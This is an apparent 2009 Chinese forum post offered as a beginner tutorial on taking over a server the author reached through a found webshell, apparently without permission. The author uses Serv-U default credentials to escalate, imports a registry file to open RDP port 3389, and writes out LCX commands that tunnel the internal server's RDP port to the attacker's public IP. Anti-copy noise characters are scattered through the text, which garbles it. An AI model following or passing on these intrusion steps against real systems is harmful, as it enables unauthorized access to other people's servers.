|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
原创作者:huar . [8 A" b+ g0 {4 H: L
原创出处:3.A.S.T 网络安全技术团队. z K9 o' F q" Z8 b; Y1 u g
* X: |' M# q& _: U! f+ q7 o简单的提权教程,希望给还不会提权的兄弟们简单介绍下。
# K' l1 _ r. L$ ?之前的一个shell,在翻看记事本的时候找到的,大致看了下,shell权限还是非常大的,于是就试试提下权。1 b Z( i# u5 Z2 [1 v+ C% D- e
1 a/ H3 y6 w' e( N5 p; @: `提权方法:SERU-U+LCX端口转发+注册表开3389端口0 L T8 f7 c! P! m) V3 U" m, v
7 e+ u+ _) y" J. G3 K3 d
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先上传个cmd试下可以运行,在查看服务器开的端口时,发现服务器开了4899、43958等端口,是没有开3389端口的(截图提权之前未截取,抱歉``)。 于是我就试下常用的Serv-U提权了,如果管理员大叔照顾我们这些小菜的话,那就太好了..
- i5 n6 x9 w$ h- G4 l$ d/ {# O$ w) G7 ^/ J; H( e3 @- Q& w& ?: q
- d/ C! {: j K+ _+ [) X
6 E+ E- g% |: ^2 k( h
先用默认账号密码试试,不过很幸运的是用默认账号密码提权成功了,嘿嘿``没想到管理员大叔这么照顾俺们这些小菜..接下来的路就好走多了~~1 ~/ W- E* ` l: c; L7 p
) i. @1 I5 z9 S1 d
前面说了,服务器是没有开3389端口的,工欲善其事必先利其器,由于现在我手中没有免杀的开3389端口的工具,所以我们就想想其它的办法吧``最后想了下,我们可以用导入注册表的方法开启服务器的3389服务端口,最后上传个开3389的注册表文件,在Serv-U命令下成功导入,3389端口成功开启.8 o6 ~# I$ B0 p( L# A& l; t
1 v, V4 G2 O* h' k' S( H6 _5 u
* U4 C; ?$ l( M. N$ y还有就是服务器是在内网了,那我们就要用LCX做端口转发。# [' O: S- [, D$ H: @8 b% R
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) 3389
: a5 C2 j. [0 ]8 o本地机器运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
4 t( I8 }4 Y) l; G8 X5 [8 J0 C, e2 Z; m! p
具体的可以参考下呆呆版主做的视频教程,做的非常详细,在这里就不再多说什么了。
$ z# R. L/ E$ H% G0 {6 ]. _" I3 H3 I8 Z; S. ]$ x. N
- n1 @( `( G) o7 {- h
最后就是我的机器也在内网,LCX 转发端口到本地必须用公网ip,这个好办,路由器里有DMZ,可以用下这个功能的``嘿嘿~~
* U6 s% e1 T# R: R
( W# X2 t) e) T* ^6 E3 S0 b: Z" Q9 j* I& Z0 v$ C: m7 p
! M5 c, B2 K, {6 D最后远程连接成功```! D8 U: G' a, o% g
/ D$ `. ?1 N2 x3 p U
- T0 J* T, \& ` _. |: U$ H
+ X6 G5 J; b( f9 P6 W( ^) @% i0 P前几天还在议论INTEL和AMD的服务器处理器的问题呢``这次就遇见个AMD的服务器,嘿嘿`````8 C& E1 Z' e" X% a6 f+ |
感觉速度还可以```` |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-6-27 18:59
| 
发表于 2009-6-28 13:03
| .gif)
发表于 2009-6-29 09:32
| 
受益了